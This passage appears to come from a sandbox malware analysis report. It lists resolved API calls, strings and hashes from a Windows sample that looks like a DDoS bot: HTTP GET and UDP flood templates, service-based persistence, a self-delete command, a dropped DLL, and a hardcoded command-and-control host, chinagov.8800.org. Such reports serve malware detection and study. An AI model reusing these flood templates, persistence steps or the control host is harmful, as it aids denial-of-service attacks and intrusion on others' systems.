                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004081C1
                                                                                              • LoadLibraryA.KERNEL32(WS2_32.dll,WSASocketA), ref: 004081D3
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004081D6
                                                                                              • LoadLibraryA.KERNEL32(WS2_32.dll,gethostname), ref: 004081E5
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004081E8
                                                                                              Strings
                                                                                              • E, xrefs: 0040760C
                                                                                              • GET %s HTTP/1.1Host: %s, xrefs: 00407C66
                                                                                              • GET %s HTTP/1.1Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*Accept-Language: zh-cnAccept-Encoding: gzip, deflateUser-Agent:Mo, xrefs: 004080C9
                                                                                              • GET %s HTTP/1.1Referer: http://%s:80/http://%sHost: %sConnection: CloseCache-Control: no-cache, xrefs: 00407A4F
                                                                                              • gethostname, xrefs: 004081DB
                                                                                              • GET %s HTTP/1.1Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*Accept-Language: zh-cnAccept-Encoding: gzip, deflateUser-Agent:Mo, xrefs: 00407FB0
                                                                                              • GET %s HTTP/1.1Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*Accept-Language: zh-cnAccept-Encoding: gzip, deflateUser-Agent:Mo, xrefs: 00407F6E
                                                                                              • WS2_32.dll, xrefs: 00407487, 004074B4, 004074C5, 004078FF, 00407AFF, 00407DA5, 00407DBA, 00407EEF, 0040803F, 00408162, 00408180, 00408195, 004081A7, 004081B9, 004081CE, 004081E0
                                                                                              • closesocket, xrefs: 004078FA, 00407AFA, 00407EEA, 0040803A, 004081B4
                                                                                              • GET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#, xrefs: 00407BC9
                                                                                              • GET %s HTTP/1.1Content-Type: text/htmlHost: %sAccept: text/html, */*User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01), xrefs: 00407CD0
                                                                                              • a, xrefs: 004075FF
                                                                                              • D, xrefs: 00407B9D
                                                                                              • %s %s%s, xrefs: 00407998, 00407B8A
                                                                                              • a, xrefs: 004075F7
                                                                                              • WSAStartup, xrefs: 004074C0, 004081A2
                                                                                              • htons, xrefs: 00407482, 00407DA0, 0040817B
                                                                                              • GET %s HTTP/1.1Content-Type: text/htmlHost: %sAccept: text/html, */*User-Agent:Mozilla/5.0 (X11; U; Linux i686; en-US; re:1.4.0) Gecko/20080808 Firefox/%d.0, xrefs: 00407A6E
                                                                                              • GET %s HTTP/1.1Content-Type: text/htmlHost: %s:%dAccept: text/html, */*User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01), xrefs: 00407D13
                                                                                              • WSASocketA, xrefs: 004081C9
                                                                                              • GET %s HTTP/1.1Host: %s:%d, xrefs: 00407C8B
                                                                                              • setsockopt, xrefs: 004074AF, 00407DB5, 00408190
                                                                                              • gethostbyname, xrefs: 0040815D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2594110174.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594167310.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594246572.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594267819.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressLibraryLoadProc$wsprintf$Sleep$ExitThreadUser$Processsend$socket$CreateTerminateinet_addrsendto$gethostbyname
                                                                                              • String ID: %s %s%s$D$E$GET %s HTTP/1.1Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*Accept-Language: zh-cnAccept-Encoding: gzip, deflateUser-Agent:Mo$GET %s HTTP/1.1Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*Accept-Language: zh-cnAccept-Encoding: gzip, deflateUser-Agent:Mo$GET %s HTTP/1.1Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*Accept-Language: zh-cnAccept-Encoding: gzip, deflateUser-Agent:Mo$GET %s HTTP/1.1Content-Type: text/htmlHost: %sAccept: text/html, */*User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)$GET %s HTTP/1.1Content-Type: text/htmlHost: %sAccept: text/html, */*User-Agent:Mozilla/5.0 (X11; U; Linux i686; en-US; re:1.4.0) Gecko/20080808 Firefox/%d.0$GET %s HTTP/1.1Content-Type: text/htmlHost: %s:%dAccept: text/html, */*User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)$GET %s HTTP/1.1Host: %s$GET %s HTTP/1.1Host: %s:%d$GET %s HTTP/1.1Referer: http://%s:80/http://%sHost: %sConnection: CloseCache-Control: no-cache$GET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#$WS2_32.dll$WSASocketA$WSAStartup$a$a$closesocket$gethostbyname$gethostname$htons$setsockopt
                                                                                              • API String ID: 1429884815-199250815
                                                                                              • Opcode ID: aef3f8ff331de28161243151cb282a45085878c6413215fd1f1b1c987d615d29
                                                                                              • Instruction ID: 3928dce49adfbc52beb91163b4814508b45c4256773abad5793f3461048422d7
                                                                                              • Opcode Fuzzy Hash: aef3f8ff331de28161243151cb282a45085878c6413215fd1f1b1c987d615d29
                                                                                              • Instruction Fuzzy Hash: 6282A271548385ABE320DB64CD45BEFBBE5EFC4704F00493EF685A7290DA74A9048B9B
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(ADVAPI32.dll,RegCloseKey), ref: 00405B47
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00405B50
                                                                                              • LoadLibraryA.KERNEL32(ADVAPI32.dll,OpenSCManagerA), ref: 00405B5E
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00405B61
                                                                                              • LoadLibraryA.KERNEL32(ADVAPI32.dll,OpenServiceA), ref: 00405B6F
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00405B72
                                                                                              • LoadLibraryA.KERNEL32(ADVAPI32.dll,CloseServiceHandle), ref: 00405B80
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00405B83
                                                                                              • LoadLibraryA.KERNEL32(KERNEL32.dll,CopyFileA), ref: 00405B95
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00405B98
                                                                                              • LoadLibraryA.KERNEL32(ADVAPI32.dll,RegSetValueExA), ref: 00405BA6
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00405BA9
                                                                                              • LoadLibraryA.KERNEL32(ADVAPI32.dll,StartServiceA), ref: 00405BB7
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00405BBA
                                                                                              • LoadLibraryA.KERNEL32(ADVAPI32.dll,RegOpenKeyA), ref: 00405BC8
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00405BCB
                                                                                              • LoadLibraryA.KERNEL32(ADVAPI32.dll,UnlockServiceDatabase), ref: 00405BD9
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00405BDC
                                                                                              • LoadLibraryA.KERNEL32(ADVAPI32.dll,ChangeServiceConfig2A), ref: 00405BEA
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00405BED
                                                                                              • LoadLibraryA.KERNEL32(ADVAPI32.dll,CreateServiceA), ref: 00405BFB
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00405BFE
                                                                                              • LoadLibraryA.KERNEL32(ADVAPI32.dll,LockServiceDatabase), ref: 00405C09
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00405C0C
                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00405C24
                                                                                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00405C32
                                                                                              • strlen.MSVCRT ref: 00405C3F
                                                                                              • strncmp.MSVCRT ref: 00405C53
                                                                                              • GetLastError.KERNEL32 ref: 00405E3E
                                                                                                • Part of subcall function 00406BD0: LoadLibraryA.KERNEL32(KERNEL32.dll,GetTickCount,Defghi Klmnopqr Tuv,00404D28,0000001A), ref: 00406BDB
                                                                                                • Part of subcall function 00406BD0: GetProcAddress.KERNEL32(00000000), ref: 00406BE2
                                                                                              • wsprintfA.USER32 ref: 00405CB5
                                                                                              • _mbscat.MSVCRT ref: 00405CC7
                                                                                              • _mbscat.MSVCRT ref: 00405CDA
                                                                                              • memset.MSVCRT ref: 00405D00
                                                                                              • _mbscpy.MSVCRT(?,?,?,00000000,00000104), ref: 00405D13
                                                                                              • _mbscpy.MSVCRT(?,SYSTEM\CurrentControlSet\Services\), ref: 00405F8E
                                                                                              • _mbscat.MSVCRT ref: 00405F9D
                                                                                              • lstrlen.KERNEL32(004059DB), ref: 00406014
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2594110174.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594167310.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594246572.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594267819.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressLibraryLoadProc$_mbscat$_mbscpy$DirectoryErrorFileLastModuleNameWindowslstrlenmemsetstrlenstrncmpwsprintf
                                                                                              • String ID: %c%c%c%c%c%c.exe$ADVAPI32.dll$ChangeServiceConfig2A$CloseServiceHandle$CopyFileA$CreateServiceA$Defghijk Mnopqrstu Wxyabcd Fghijklm Opq$Description$KERNEL32.dll$LockServiceDatabase$OpenSCManagerA$OpenServiceA$RegCloseKey$RegOpenKeyA$RegSetValueExA$SYSTEM\CurrentControlSet\Services\$StartServiceA$UnlockServiceDatabase
                                                                                              • API String ID: 386357465-766656692
                                                                                              • Opcode ID: 0664e4838cc323b1f4e72241ddd9614066d39b97ab9bfac67c13d6ea83ed0be3
                                                                                              • Instruction ID: cb804ed11c5d1b7d2f4ad966b6bff0d4186705c14a699b97b59b11ec4e5a602e
                                                                                              • Opcode Fuzzy Hash: 0664e4838cc323b1f4e72241ddd9614066d39b97ab9bfac67c13d6ea83ed0be3
                                                                                              • Instruction Fuzzy Hash: BCE168B1C0426CABDB229B65CC49BDEBEBCAF15744F0440EAE10CB6191C7B95B848F65
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(WS2_32.dll,htons), ref: 00406DCA
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00406DD3
                                                                                              • LoadLibraryA.KERNEL32(WS2_32.dll,setsockopt), ref: 00406DE1
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00406DE4
                                                                                                • Part of subcall function 00406BD0: LoadLibraryA.KERNEL32(KERNEL32.dll,GetTickCount,Defghi Klmnopqr Tuv,00404D28,0000001A), ref: 00406BDB
                                                                                                • Part of subcall function 00406BD0: GetProcAddress.KERNEL32(00000000), ref: 00406BE2
                                                                                                • Part of subcall function 00406C10: LoadLibraryA.KERNEL32(WS2_32.dll,gethostbyname,76F8F550,76F90BD0,00404875,chinagov.8800.org), ref: 00406C1C
                                                                                                • Part of subcall function 00406C10: GetProcAddress.KERNEL32(00000000), ref: 00406C23
                                                                                                • Part of subcall function 00406C10: inet_addr.WS2_32(?), ref: 00406C30
                                                                                                • Part of subcall function 00406C10: gethostbyname.WS2_32(?), ref: 00406C3B
                                                                                              • socket.WS2_32(00000002,00000002,00000000), ref: 00406E79
                                                                                              • sendto.WS2_32(00000000,?,-00000401,00000000,?,00000010), ref: 00406EC6
                                                                                              • Sleep.KERNEL32(00000014), ref: 00406ECD
                                                                                              • RtlExitUserThread.NTDLL(00000000), ref: 00406EDE
                                                                                              • LoadLibraryA.KERNEL32(WS2_32.dll,closesocket), ref: 00406F0A
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00406F13
                                                                                              • LoadLibraryA.KERNEL32(WS2_32.dll,htons), ref: 00406F21
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00406F24
                                                                                              • LoadLibraryA.KERNEL32(WS2_32.dll,WSAStartup), ref: 00406F32
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00406F35
                                                                                              • socket.WS2_32(00000002,00000001,00000006), ref: 00406F97
                                                                                              • connect.WS2_32(00000000,?,00000010), ref: 00406FA7
                                                                                              • send.WS2_32(00000000,?,00000800,00000000), ref: 0040702E
                                                                                              • Sleep.KERNEL32(0000000A), ref: 00407032
                                                                                              • RtlExitUserThread.NTDLL(00000000), ref: 0040703B
                                                                                              • LoadLibraryA.KERNEL32(KERNEL32.dll,GetTickCount,761E58A0,00000000,00000000,76F90F00), ref: 0040706E
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00407077
                                                                                              • LoadLibraryA.KERNEL32(WS2_32.dll,WSAStartup), ref: 00407087
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0040708A
                                                                                              • LoadLibraryA.KERNEL32(WS2_32.dll,WSASocketA), ref: 00407098
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0040709B
                                                                                              • sendto.WS2_32(00000000,?,0000100C,00000000,?,00000010), ref: 004071A3
                                                                                              • RtlExitUserThread.NTDLL(00000000), ref: 004071AB
                                                                                              • Sleep.KERNEL32(000001F4), ref: 00407210
                                                                                              • RtlExitUserThread.NTDLL(00000000,?,00000000), ref: 00407216
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2594110174.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594167310.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594246572.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594267819.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressLibraryLoadProc$ExitThreadUser$Sleep$sendtosocket$connectgethostbynameinet_addrsend
                                                                                              • String ID: GetTickCount$KERNEL32.dll$WS2_32.dll$WSASocketA$WSAStartup$closesocket$htons$setsockopt
                                                                                              • API String ID: 1080867297-3926040945
                                                                                              • Opcode ID: f8a2499b1aef589c456f9f75b8d754b15eace620b909dc858667b967397af7d0
                                                                                              • Instruction ID: 108494642a65384e92ce671c93e0be5eb4aeb19d0da13a5ceb95eb50e5242d09
                                                                                              • Opcode Fuzzy Hash: f8a2499b1aef589c456f9f75b8d754b15eace620b909dc858667b967397af7d0
                                                                                              • Instruction Fuzzy Hash: 6BB118716483446BE314EB64DC05FAF77E5EBC9704F01093EF645BB2D0DAB89904879A
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(WS2_32.dll,gethostbyname), ref: 0040816D
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00408176
                                                                                              • LoadLibraryA.KERNEL32(WS2_32.dll,htons), ref: 00408185
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00408188
                                                                                              • LoadLibraryA.KERNEL32(WS2_32.dll,setsockopt), ref: 0040819A
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0040819D
                                                                                              • LoadLibraryA.KERNEL32(WS2_32.dll,WSAStartup), ref: 004081AC
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004081AF
                                                                                              • LoadLibraryA.KERNEL32(WS2_32.dll,closesocket), ref: 004081BE
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004081C1
                                                                                              • LoadLibraryA.KERNEL32(WS2_32.dll,WSASocketA), ref: 004081D3
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004081D6
                                                                                              • LoadLibraryA.KERNEL32(WS2_32.dll,gethostname), ref: 004081E5
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004081E8
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2594110174.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594167310.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594246572.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594267819.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressLibraryLoadProc
                                                                                              • String ID: %d.%d.%d.%d$($E$P$WS2_32.dll$WSASocketA$WSAStartup$closesocket$gethostbyname$gethostname$htons$setsockopt
                                                                                              • API String ID: 2574300362-3688028543
                                                                                              • Opcode ID: 4a3c82638dccf32fa90216d1273ea8970814657705a3f54d8f00e494abda61eb
                                                                                              • Instruction ID: 53d6d929515b9e91ab4b685de5499f61474fe8fa857c4809401ddf33aa41e7a7
                                                                                              • Opcode Fuzzy Hash: 4a3c82638dccf32fa90216d1273ea8970814657705a3f54d8f00e494abda61eb
                                                                                              • Instruction Fuzzy Hash: A1D16EB5D402699BDB20DBA4CD89FEDB7B5EF94304F0040AEE249B7290DBB459C08F59
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(KERNEL32.dll,GetSystemDirectoryA), ref: 00406C6A
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00406C73
                                                                                              • LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcatA), ref: 00406C81
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00406C84
                                                                                              • LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcpyA), ref: 00406C92
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00406C95
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2594110174.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594167310.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594246572.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594267819.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressLibraryLoadProc
                                                                                              • String ID: $ $.$E$F$GetSystemDirectoryA$I$KERNEL32.dll$P$\$\$\$a$g$i$i$lstrcatA$lstrcpyA$m$n$n$o$o$o$p$p$s
                                                                                              • API String ID: 2574300362-3412716298
                                                                                              • Opcode ID: 8249b312c4c04751acff0aaaeb5fd0c636e29cc8b9147592e794b1a22bdd32d1
                                                                                              • Instruction ID: 1cc97e3852dfcfcdc61d028ea0c2383468fb858139331ce9ede19e0ea5d9e28d
                                                                                              • Opcode Fuzzy Hash: 8249b312c4c04751acff0aaaeb5fd0c636e29cc8b9147592e794b1a22bdd32d1
                                                                                              • Instruction Fuzzy Hash: 0041E61114D3C19DE312DA799884A8FBFD55BB6608F481D9EF1C427293C2AAC64CC7BB
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcatA,00000000,Defghi Klmnopqr Tuv,00000000), ref: 00403571
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00403578
                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 004035D3
                                                                                              • GetShortPathNameA.KERNEL32(?,?,00000104), ref: 004035E8
                                                                                              • GetEnvironmentVariableA.KERNEL32(COMSPEC,?,00000104), ref: 004035FB
                                                                                              • ShellExecuteEx.SHELL32(0000003C), ref: 00403675
                                                                                              • SetPriorityClass.KERNEL32(?,00000040), ref: 00403689
                                                                                              • GetCurrentProcess.KERNEL32(00000100), ref: 00403690
                                                                                              • SetPriorityClass.KERNEL32(00000000), ref: 00403697
                                                                                              • GetCurrentThread.KERNEL32 ref: 0040369B
                                                                                              • SetThreadPriority.KERNEL32(00000000), ref: 004036A2
                                                                                              • SHChangeNotify.SHELL32(00000004,00000001,?,00000000), ref: 004036B4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2594110174.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594167310.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594246572.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594267819.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Priority$ClassCurrentNameThread$AddressChangeEnvironmentExecuteFileLibraryLoadModuleNotifyPathProcProcessShellShortVariable
                                                                                              • String ID: > nul$/c del $<$COMSPEC$Defghi Klmnopqr Tuv$KERNEL32.dll$O$e$lstrcatA$n$p
                                                                                              • API String ID: 3227834783-364147672
                                                                                              • Opcode ID: bb42670f56283ada0ce27347b1802bba000ccfeec7695c9d886015269e5674b7
                                                                                              • Instruction ID: e1efa2a12065ff2590d5ce24305b170e8e226b043a9d1efffb27e628f7bfc04e
                                                                                              • Opcode Fuzzy Hash: bb42670f56283ada0ce27347b1802bba000ccfeec7695c9d886015269e5674b7
                                                                                              • Instruction Fuzzy Hash: 4B413E72D0125DBFDB118BA4DD48BDEBFBCAB08345F0444B6E209F61A0D6745A88CF64
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,SizeofResource), ref: 0040525A
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00405261
                                                                                              • FindResourceA.KERNEL32(?,?,?), ref: 00405272
                                                                                              • LoadResource.KERNEL32(?,00000000), ref: 00405291
                                                                                              • LockResource.KERNEL32(00000000), ref: 004052A9
                                                                                              • wsprintfA.USER32 ref: 004052C4
                                                                                              • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 004052E0
                                                                                              • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00405300
                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00405306
                                                                                              • lstrlen.KERNEL32(00401B2C,?,00000000), ref: 00405316
                                                                                              • WriteFile.KERNEL32(00000000,00401B30,00000000), ref: 00405323
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00405326
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2594110174.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594167310.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594246572.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594267819.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: File$Resource$LoadWrite$AddressCloseCreateFindHandleLibraryLockPointerProclstrlenwsprintf
                                                                                              • String ID: SizeofResource$hra%u.dll$kernel32.dll
                                                                                              • API String ID: 1940342438-2774179399
                                                                                              • Opcode ID: d84aa10ad67f5b4d4d257d4d4e681f3cfadd9e1c325ffe4c470ab3111da27952
                                                                                              • Instruction ID: b3e8c15927428f48014e7fda34fba09b7f25a33c83898dee726e7fdda32e3d2c
                                                                                              • Opcode Fuzzy Hash: d84aa10ad67f5b4d4d257d4d4e681f3cfadd9e1c325ffe4c470ab3111da27952
                                                                                              • Instruction Fuzzy Hash: 62214171100258BBCB206F71DD8CE9F3F6DEB45790F104432F909A21B0D6B49980CBA4
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(ADVAPI32.dll,SetServiceStatus), ref: 00405898
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0040589F
                                                                                              • Sleep.KERNEL32(000001F4), ref: 004058E2
                                                                                              • Sleep.KERNEL32(000001F4), ref: 00405926
                                                                                              • Sleep.KERNEL32(000001F4), ref: 00405961
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2594110174.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594167310.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594246572.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594267819.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Sleep$AddressLibraryLoadProc
                                                                                              • String ID: ADVAPI32.dll$SetServiceStatus
                                                                                              • API String ID: 238394870-1924299548
                                                                                              • Opcode ID: f244ac2fdfcf7e27f983d47bd2e476e1663f6f9b5c6e818040c90ec42e299550
                                                                                              • Instruction ID: a5c8a0c86872ce331e11fcaa3c45903c56c1e4641523fec5342e9324e04e0236
                                                                                              • Opcode Fuzzy Hash: f244ac2fdfcf7e27f983d47bd2e476e1663f6f9b5c6e818040c90ec42e299550
                                                                                              • Instruction Fuzzy Hash: 6A1158B1121262DBFB105B16EE4CB573AA6F704319F00803AE544B62B2C7B90C54CF3E
                                                                                              APIs
                                                                                              • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,00404EA9,Defghi Klmnopqr Tuv), ref: 00403523
                                                                                              • OpenServiceA.ADVAPI32(00000000,?,000F01FF,00000000,Defghi Klmnopqr Tuv), ref: 00403539
                                                                                              • DeleteService.ADVAPI32(00000000), ref: 0040354C
                                                                                              • CloseServiceHandle.ADVAPI32(00000000), ref: 00403553
                                                                                              • CloseServiceHandle.ADVAPI32(00000000), ref: 00403556
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2594110174.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594167310.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
